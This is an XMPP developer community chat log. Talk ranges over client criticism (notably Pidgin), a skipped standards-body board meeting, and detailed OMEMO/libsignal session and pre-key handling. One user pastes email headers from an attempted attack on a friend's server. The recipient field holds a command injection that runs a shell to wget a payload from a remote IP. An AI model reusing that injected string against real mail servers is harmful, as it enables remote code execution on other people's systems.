-
edhelas
https://techcrunch.com/2019/06/26/india-government-inhouse-chat-app-whatsapp/
-
adityaborikar
edhelas: thumbsup !
-
edhelas
related HN thread https://news.ycombinator.com/item?id=20291889#20292122
-
edhelas
if you guys wants to reply
-
Yagiza
Daniel, are you here?
-
Daniel
Yagiza: it's probably better if you just ask your question since there are other people in here who can answer them as well
-
Daniel
As lovetox demonstrated yesterday
-
Yagiza
Daniel, ok
-
Yagiza
So, once session_cipher is created, I don't need session_builder anymore?
-
rion
Is it possible to add Psi here https://xmpp.org/getting-started/ ?
-
rion
ah there is a list on another page. ok.
-
Zash
https://xmpp.org/software/clients.html ?
-
rion
so the first list is discriminating all other clients :)
-
Zash
It would be nice if there were more detailed getting-started tutorials, with pictures and stuff. Maybe you could do one for Psi?
-
Zash
"get a client, get an account, done!" seems a bit bare
-
Zash
Let's not have another fight over this page 😕
-
jonas’
maybe clients should make tutorials superfluous by having proper onboarding
-
jonas’
with server lists and stuff
-
jonas’
and then we can make it a criterium for a client to have that type of flow to be listed on getting_started
-
jonas’
and Ge0rG can finally get rid of his pidgin
-
Zash
I don't see Pidgin there
-
jonas’
oh, so that was fixed already
-
rion
what's wrong with Pidgin?
-
jonas’
lack of support for any modern XMPP feature?
-
jonas’
and don’t get me started on plugins
-
Ge0rG
tl;dr: everything is wrong
-
jonas’
you know, pidgin, the type of client where you have to ask "did you write anything?" when the peer goes off- and online, because it doesn’t have stream management *or* MAM
-
jonas’
you know, pidgin, the type of client where you need to make other clients resource-lock to, otherwise you don’t get messages (no carbons)
-
jonas’
you know, pidgin, the type of client where you have to consciously log off before switching networks/suspending to not lose messages (again, no SM or MAM)
-
jonas’
you know, pidgin, the type of client which has an architecture which makes it easy for crypto plugins to accidentally send plaintext instead of ciphertext when you start a message with "/me"
-
jonas’
(I’m stopping now)
- pep. deserves its own rant anyway
-
pep.
fail.
-
jonas’
bahaha
-
pep.
Why poezio.. why..
-
pep.
"//me" doesn't even work
-
jonas’
it can’t
-
jonas’
and you know why :)
-
jonas’
that’s why you want to rant about it
-
jonas’
you need ///me
-
pep.
Yes
-
jonas’
and then everyone will see "//me" :)
-
pep.
jonas’, why I have you, can you merge this plz https://github.com/xsf/xmpp.org/pull/582 :)
-
rion
Well I always used Pidgin just like a transport for spectrum =)
-
pep.
I think there are also horror stories with that
-
jonas’
pep., I don’t have github credentials at work
-
jonas’
oh, spectrum with libpurple? you know, the IRC transport where you would get disconnected when you sent a message starting with ``/quit`` to the transport?
-
jonas’
or was it the transport where you would get disconnected when you sent a multi-line message like: foo QUIT :bar
-
jonas’
to get disconnected?
-
jonas’
I *am* in a ranty mood today.
-
rion
unfortunately Pidgin's Skype integration is full of bugs. That's what I needed at most last time.
-
neshtaxmpp
moparisbest: someone comment 127.0.0.1 or number ip is not importamr and this is LIE. today mi friend comment someone connect from 127.0.0.1 and send this: Return-Path: <root@1ur.com> X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.com Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.com Received: from localhost (localhost [127.0.0.1]) by yourdomain.com (Postfix) with ESMTP id A94DBA00B30 for <root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@yourdomain.con>; Wed, 26 Jun 2019 02:58:45 +0200 (CEST) X-Quarantine-ID: <UdVj8nzxJJRS> X-Virus-Scanned: Debian amavisd-new at yourdomain.com X-Amavis-Alert: BAD HEADER SECTION, Missing required header field: "Date" Message-Id: <20190626005845.A94DBA00B30@yourdomain.com> Date: Wed, 26 Jun 2019 02:58:45 +0200 (CEST) From: root@1ur.com
-
jonas’
neshtaxmpp, this room is not about email.
-
neshtaxmpp
jonas’: it is about sslh and someone try hack my friend server throught sslh. i need someone commment how sslh sopve apache2 to show real ip and block 127.0.0.1 not to be used outside internet.
-
jonas’
this room also is not about sslh
-
jonas’
or sysadmin in general
-
vanitasvitae
neshtaxmpp, tell your fried to visit a local hackerspace to get help, but please do not bother the people in this room about it.
-
pep.
vanitasvitae, I wish hackerspaces were as big a thing anywhere else than they are in germany, but it's not the case :(
-
Daniel
I'm not entirely sure hackerspaces want to be a replacement for search engines
-
Zash
Maybe there's even a support venue for sslh itself.
- Seve is on its way to the airport. Crossing fingers for a stable connection
-
Guus
Ralph and Matt can't make it.
-
Guus
if you're not on a reliable connection, we might as well skip the meeting, unless something important needs to be handled.
-
Guus
(assuming that nyco is here, in the first place)
-
Seve
Right
-
nyco
good guess
-
Guus
do we skip this meeting or not?
-
nyco
let me check the board
-
nyco
followup on badges is ok, I've not done the poll yet
-
nyco
so yes, I think we need more members to really advance
-
Seve
I guessed that, yes
-
Guus
ok, let's skip this meeting then.
-
nyco
three is good from a bylaws standpoint, but imho not enough for debate and decision making
-
Guus
agreed
-
nyco
ok
-
nyco
so, bang, and bang, done, thx all, +1W ;-)
-
Guus
have a good flight, Seve 🙂
-
nyco
I believe I can flyyyyy
-
Seve
😁
-
Guus
If your pilot sings that: run.
-
Seve
Oh... Haha
-
Seve
If I hear that, it may be too late
-
Ge0rG
Aw, what a pity. I wanted to provide an update regarding the German government contact.
-
Guus
Ge0rG - could you do that by mail, if it's longer than 2 sentences?
-
Guus
Do you need our input to progress?
-
Ge0rG
Guus: yes I can. No input needed so far. Should I write to members@?
-
Guus
if it's of interest to the members, yes. Otherwise: did we solve that Board mailing thingy?
-
Guus
(Seve?)
-
Yagiza
Well...
-
Yagiza
Where can I get session_cipher to decrypt pre_key_signal_message?
-
Ge0rG
Guus: IIRC somebody is now looking for external mail to board@ or somesuch
-
jonas’
Ge0rG, Seve typically does that
-
Guus
(Who's now in a plane)
-
Guus
Ge0rG if you're unsure if it's suitable for members@, mail it to me, and I'll forward it to board@
-
Ge0rG
Guus: I'll try to write down something when I have a bit of time. Don't think there are any issues with using members@
-
Guus
tx
-
lovetox
Yagiza, yes session is only once build, after that you load the session from the database and use it to decrypt and encrypt
-
Yagiza
lovetox, so, I have different question.
-
Yagiza
lovetox, how to generate session_cipher to decrypt pre_key_signal_message?
-
Yagiza
Do I have to decrypt it with a key, generated with empty session_builder (before session_builder_process_pre_key_bundle()) call?
-
lovetox
hm i cant talk much about the C lib but in the python port
-
lovetox
you create a new session_cipher
-
lovetox
then use ession_cipher.decryptPkmsg(pre_key_message)
-
lovetox
and the decryptPkmsg, does create a new session on its own and saves it to the database
-
lovetox
so nothing more to do here
-
lovetox
is there something similar in the C version?
-
lovetox
there session_cipher_decrypt_pre_key_signal_message
-
lovetox
looked it up
-
lovetox
it does everything for you
-
lovetox
create a new session, store it to the db, decrypt the message
-
Yagiza
lovetox, so, after that call, current session is invalidated and new session is created instead?
-
lovetox
yes
-
lovetox
thats also how you refresh a session, you just send a new pkmg
-
lovetox
but normally this should not be necessery
-
Yagiza
lovetox, do I need to generate new session_cipher after that?
-
lovetox
session_cipher is only a wrapper
-
lovetox
it does not hold any state itself
-
lovetox
you call decrypt or encrypt on it, what it does is it loads the session from the database everytime
-
lovetox
you can also recreate it after each message if you want
-
Yagiza
lovetox, so, once session is changed, existing session_cipher will use a new session data?
-
lovetox
yes
-
lovetox
i create it on the first message for each contact
-
lovetox
and cache it
-
lovetox
but you dont have to, you can also create it on every message new, does not make a difference
-
Yagiza
lovetox, IC
-
lovetox
session is loaded on each message, modified and stored back to database
-
lovetox
otherwise it would be highly likely that you have invalid session if your application crashes
-
lovetox
so no state is hold in memory
-
Yagiza
lovetox, ok
-
Yagiza
lovetox, so, I need session_builder only when initiating session. If session initiated by other party, it is created by session_cipher_decrypt_pre_key_signal_message(), right?
-
lovetox
yes
-
Yagiza
lovetox, IC. Thank you.
-
Yagiza
lovetox, and the last question.
-
Yagiza
lovetox, how do I decide, to which resources of my contact do I need to send encrypted messages, and to which of them not encrypted? Only by checking if it has 'eu.siacs.conversations.axolotl.devicelist+notify' #disco feature?
-
lovetox
no
-
lovetox
you dont send messages to resources
-
lovetox
or better said all messages you send will arrive at all resources of the contact
-
lovetox
because of carbons, mam etc
-
Yagiza
lovetox, I can't be sure that all of resources of my contact do support OMEMO.
-
lovetox
you dont change anything about how you send a message
-
lovetox
Yagiza, you can be sure that one device supports it
-
lovetox
and thats enough
-
lovetox
the user decides if he wants to send encrypted or not
-
lovetox
not the client
-
Yagiza
lovetox, what do you mean? I have a contact. And I se all of their resources. And I can choose to which of them to send message.
-
Yagiza
lovetox, at least, my cliend allows that.
-
lovetox
so your client makes the server not save the message in MAM
-
lovetox
?
-
lovetox
otherwise you cant control who downloads a message from the archive
-
Yagiza
lovetox, my client to not support MAM yet.
-
lovetox
but the server has
-
Yagiza
lovetox, so?
-
lovetox
and the server stores all messages in MAM
-
lovetox
if you want or not
-
Yagiza
lovetox, ok
-
lovetox
and other clients will download it
-
lovetox
dont assume you can control who gets the message
-
lovetox
other than the barejid
-
lovetox
you find keys in pep
-
lovetox
then you know at least one device of the contact supports it
-
lovetox
and afterwards you give your user the decision if he wants to talk encrypted or not
-
Yagiza
lovetox, anyway. When I send encrypted message, clients, which do not support OMEMO will just ignore it. When I send unencrypted message, all the clients may read and display it.
-
lovetox
yes
-
Yagiza
And I can't be sure, that my or their server do support MAM.
-
lovetox
and you cant know if the user is fine with that
-
lovetox
the user maybe totally fine with one of his devices ignoring omemo
-
lovetox
and only one device beeing able to decrypt
-
Yagiza
Yes
-
lovetox
i just try to save you implementation trouble, you can try to make logic that start and stops encrypting if this and that happens
-
lovetox
but i tell you from experience users will come and tell you they want to make the decision themself
-
lovetox
especially disco info is useless here
-
Yagiza
So, if user enabled OMEMO encryption for a contact, but selected a resource, which do not support it, I must somehow make him aware of the fact and send unencrypted messages in that case.
-
lovetox
it only works if a client is online
-
lovetox
omemo works also if the contact is offline
-
lovetox
dont forget that
-
Yagiza
lovetox, yes. That's not a problem.
-
lovetox
Yagiza, why do you even have UI where the user selects a resoure
-
Yagiza
lovetox, I'm telling only about the sace above.
-
Yagiza
lovetox, because that's a good tradition.
-
lovetox
if i talk as a user, i dont care how many devices are online of my friend, i just want to send him a message
-
Yagiza
lovetox, not all the servers do support MAM or Message Archving or Message Carbons.
-
lovetox
Yagiza, then we should tell the admins to upgrade
-
Yagiza
So, it's a good thing to have an ability to specify a resource.
-
lovetox
i cant help you with that, thats not a usecase for me to write clients for servers from the stoneage
-
Yagiza
lovetox, IC. So, you think sending messages to bare JID is a good idea?
-
lovetox
Yagiza, thats not what i wanted to say, allthough many devs in the community would answer that question with yes
-
lovetox
what i want to say is, that i think its bad UI if you make the user force a resource
-
lovetox
because user has to know about what a resource is, that is xmpp protocol stuff
-
lovetox
users just want to write messages
-
lovetox
and you should no assume only because you adress a message to a resource, that only this resource will get the message
-
Yagiza
lovetox, yes, of course.
-
lovetox
that is 99% wrong assumption in our current world
-
jonas’
send to the bare JID
-
jonas’
you’ll be in pain when IM-NG lands otherwise :)
-
pep.
When is that :/
-
pep.
Any client/server already doing things with it? More than what MattJ said at the summit
-
jonas’
I think there was some discussion about that type of stuff the other day
-
jonas’
but don’t pin me down on tha
-
jonas’
I wish I had time to experiment with things, but so many fires to fight these weeks
-
pep.
People in IT always playing with fire..
-
jonas’
ha
-
pep.
Though with the current temperature..
-
pep.
https://upload.bouah.net/upload/_tGYZRYmjJHFBvmx/hrsPzCX6ROecghJJhbvNXA.jpg
-
jonas’
holy smokes
-
jonas’
I feel sorry for you
-
jonas’
and I thought we had bad luck with the 38°C yesterday
-
jonas’
(dropped to 25°C today)
-
lovetox
i dont find the xep that defines dataforms for disco info
-
lovetox
ah 128
-
Yagiza
And one more question...
-
Yagiza
After I processed PreKeySignalMessage, an appropriate pre key is automatically substituted with a new one? So, I only need to refresh the bundle on the PEP server?
-
lovetox
no
-
lovetox
the prekey which was used, is deleted from the database
-
lovetox
but no new keys are generated
-
lovetox
you have to do this yourself
-
lovetox
and of course you should instantly delete the prekey used from pep
-
Yagiza
lovetox, so, I need generate a new key instead of used one? Ok.
-
lovetox
you dont have to generate new ones, i mean we publish 100 keys
-
lovetox
you can also generate new ones when you reach 90 or something like this
-
lovetox
but you have to delete the used one from pep, so you have to push 99 keys anyway
-
lovetox
so i would say just generate one and push 100 again
-
Yagiza
lovetox, I aware about publishing new bundle of 100 keys.
-
Yagiza
lovetox, the only question was about generating a new key instead of used one.
-
lovetox
im not following, if a key is used, you only have 99, if you aware that you should have 100 keys
-
lovetox
what is there for other option than generate 1 new key?
-
Yagiza
lovetox, I didn't know old key is deleted and a new one is generated automatically, or not. So, once you told me that it is deleted, but no new key is generated, I understand, that I only need to generate a new key to replace used one.
-
lovetox
ah ok :)
-
lovetox
and Yagiza we should move the discussion to xmpp:jdev@conference.jabber.org?join this room is more suited
-
Yagiza
lovetox, yes. I tried to ask there, but almost no one replied.
-
lovetox
im always joined there :)
-
Yagiza
lovetox, me too.
-
vanitasvitae
Yagiza: you could take a look at https://blog.jabberhead.tk/2019/04/15/closer-look-at-the-double-ratchet/ to understand the inner workings of the signal protocol.
-
Yagiza
vanitasvitae, ok, thank you!
-
lovetox
can someone verify that the example here is wrong https://xmpp.org/extensions/xep-0128.html#examples
-
lovetox
as it has a field without type which means text-single
-
lovetox
but still has multiple <values>
-
lovetox
which is a MUST NOT in 0004
-
lovetox
or am i missing something
-
moparisthebest
jonas’, vanitasvitae: I've tried more than once to help neshtaxmpp by linking him to exactly what he was asking for etc, he's either a troll or beyond help, I just ignore now
-
pep.
moparisthebest, yeah I have also given in this domain :)
-
vanitasvitae
Yeah I also dealt with him repeatedly :D